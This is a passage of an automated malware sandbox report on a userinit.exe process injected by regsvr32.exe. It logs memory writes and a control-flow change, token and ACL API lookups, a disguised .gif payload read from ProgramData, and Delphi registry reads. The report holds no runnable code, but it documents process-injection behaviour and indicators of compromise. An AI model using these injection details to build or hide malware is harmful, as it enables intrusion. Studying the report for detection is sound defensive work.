Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 397295	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #54: userinit.exe

222

0

»

Information	Value
ID	#54
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:19, Reason: Child Process
Unmonitor	End Time: 00:03:23, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x980
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 8D8 0x 8E0 0x 99C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x0010ffff	Private Memory	rw	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rwx	-
private_0x0000000000120000	0x00120000	0x0021ffff	Private Memory	rw	-
pagefile_0x0000000000220000	0x00220000	0x00226fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00240000	0x00240fff	Memory Mapped File	r	-
private_0x0000000000250000	0x00250000	0x00250fff	Private Memory	rwx	-
private_0x0000000000260000	0x00260000	0x0029ffff	Private Memory	rw	-
pagefile_0x00000000002a0000	0x002a0000	0x002a1fff	Pagefile Backed Memory	r	-
private_0x00000000002b0000	0x002b0000	0x002bffff	Private Memory	rw	-
pagefile_0x00000000002c0000	0x002c0000	0x00387fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00390000	0x00390fff	Memory Mapped File	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x005fffff	Private Memory	rw	-
private_0x0000000000630000	0x00630000	0x0063ffff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x0073ffff	Private Memory	-	-
private_0x0000000000740000	0x00740000	0x007fffff	Private Memory	rw	-
userinit.exe	0x00800000	0x00808fff	Memory Mapped File	rwx	-
pagefile_0x0000000000810000	0x00810000	0x0140ffff	Pagefile Backed Memory	r	-
private_0x0000000001410000	0x01410000	0x014fffff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x01490fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x01494fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x01498fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x0149cfff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014a0fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014a4fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014a8fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014acfff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014b0fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014b4fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014b8fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014bcfff	Private Memory	rw	-
private_0x00000000014c0000	0x014c0000	0x014fffff	Private Memory	rw	-
pagefile_0x0000000001500000	0x01500000	0x015defff	Pagefile Backed Memory	r	-
staticcache.dat	0x015e0000	0x01f0ffff	Memory Mapped File	r	-
pagefile_0x0000000001f10000	0x01f10000	0x02302fff	Pagefile Backed Memory	r	-
private_0x0000000002310000	0x02310000	0x0241cfff	Private Memory	rw	-
private_0x0000000002420000	0x02420000	0x0251ffff	Private Memory	rw	-
private_0x0000000002520000	0x02520000	0x0271ffff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027a2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027a6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027aafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027aefff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027b2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027b6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027bafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027befff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027c2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027c6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027cafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027cefff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027d4fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027d8fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027dcfff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027e2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027e6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027eafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027eefff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027f4fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027f8fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027fcfff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02802fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02806fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0280afff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0280efff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02814fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02818fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0281cfff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02822fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02826fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0282afff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0282ffff	Private Memory	-	-
private_0x00000000027d0000	0x027d0000	0x02880fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x02896fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x0289afff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x0289efff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028b4fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028b8fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028bcfff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028c0fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028d6fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028dafff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028defff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028f4fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028f8fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028fcfff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02900fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02916fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0291afff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0291efff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02934fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02938fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0293cfff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x02942fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x02960fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x029a2fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029c0fff	Private Memory	rw	-
private_0x0000000002910000	0x02910000	0x02a02fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a20fff	Private Memory	rw	-
private_0x0000000002940000	0x02940000	0x02a52fff	Private Memory	rwx	-
private_0x0000000002a60000	0x02a60000	0x02b5ffff	Private Memory	-	-
private_0x0000000002be0000	0x02be0000	0x02cdffff	Private Memory	rw	-
sortdefault.nls	0x02ce0000	0x02faefff	Memory Mapped File	r	-
olepro32.dll	0x6d720000	0x6d738fff	Memory Mapped File	rwx	-
comctl32.dll	0x6d740000	0x6d7c3fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffdf008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x8d8, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d720000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d740000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ñ, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d77266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d772542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d771d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d77238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7720c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d771fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d771e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d771f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d771ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d77216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7722be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7721e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d7220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d7220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d7220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d7220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 1118191	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
